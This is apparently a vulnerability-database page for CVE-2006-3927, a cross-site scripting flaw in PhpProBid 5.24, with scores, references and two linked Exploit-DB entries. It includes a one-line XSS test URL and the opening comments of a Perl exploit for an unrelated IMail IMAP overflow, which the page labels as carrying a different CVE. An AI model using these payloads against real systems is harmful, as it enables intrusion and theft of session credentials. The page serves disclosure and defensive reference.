CVE-2006-3927
Published 2006-07-31
Priority: P4 · Severity: medium · CVSS 2.0 base score: 4.3
CVSS 2.0 vector: AV:N/AC:M/Au:N/C:N/I:P/A:N
Public exploit available (see the Exploit-DB entries below).
EPSS: 1.89% (77.0th percentile)
Cross-site scripting (XSS) vulnerability in auctionsearch.php in PhpProBid 5.24 allows remote attackers to inject arbitrary web script or HTML via the advsrc parameter.
Affected
1 range
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| php_pro_bid | php_pro_bid | — | — |
No detection rules found.
Exploit-DB
IPSwitch IMail Server 2006 9.10 - Subscribe Remote Overflow (exploitdb · 2007-07-26, CVE-2007-3927; note that this entry carries a different CVE identifier from the one this page documents)
---
```perl
#!/usr/bin/perl
# Test on Imail 2006(9.10), imap4d32.exe(6.8.8.1), windows 2003 Chinese SP1
# Code by yunshu, our team: www.ph4nt0m.org Mail list: http://list.ph4nt0m.org
#F:\>perl imail_SUBSCRIBE.pl 192.168.1.2 test_user test_pass
#* OK IMAP4 Server (IMail 9.10)
#0 OK LOGIN completed
#* FLAGS (\Answered \Flagged \Deleted \Seen \Draft)
#* 0 EXISTS
#* 0 RECENT
#* OK [UIDVALIDITY 1185270594] UIDs valid
#* OK [UIDNEXT 485270595] Predicted next UID
#2 OK [READ-WRITE] SELECT completed
#3 OK SUBSCRIBE completed
#Trying..
#Bingle!Maybe get it!
#You can try to telnet 22 port, do you have nc?
#D:\Microsoft Visual Studio 8\VC>nc -vv 192.168.1.2 22
#192.168.1.2: inverse host lookup failed: h_errno 11004: NO_DATA
#(UNKNOWN) [192.168
```
Exploit-DB
PHP Pro Bid 5.2.4 - 'auctionsearch.php?advsrc' Cross-Site Scripting (exploitdb · 2006-07-25, CVE-2006-3927)
---
source: https://www.securityfocus.com/bid/19158/info
PHP Pro Bid is prone to multiple input-validation vulnerabilities, including cross-site scripting and SQL-injection issues, because the application fails to properly sanitize user-supplied input.
A successful exploit of these vulnerabilities could allow an attacker to compromise the application, access or modify data, steal cookie-based authentication credentials, or even exploit vulnerabilities in the underlying database implementation. Other attacks are also possible.
Version 5.24 is vulnerable to these issues; other versions may also be affected.
http://www.example.com/auctionsearch.php?advsrc="alert(/EllipsisSecurityTest/)
No writeups or analysis indexed.
References
- http://archives.neohapsis.com/archives/bugtraq/2006-07/0474.html
- http://secunia.com/advisories/21201
- http://securityreason.com/securityalert/1298
- http://securitytracker.com/id?1016595
- http://www.osvdb.org/27544
- http://www.securityfocus.com/bid/19158
- https://exchange.xforce.ibmcloud.com/vulnerabilities/28030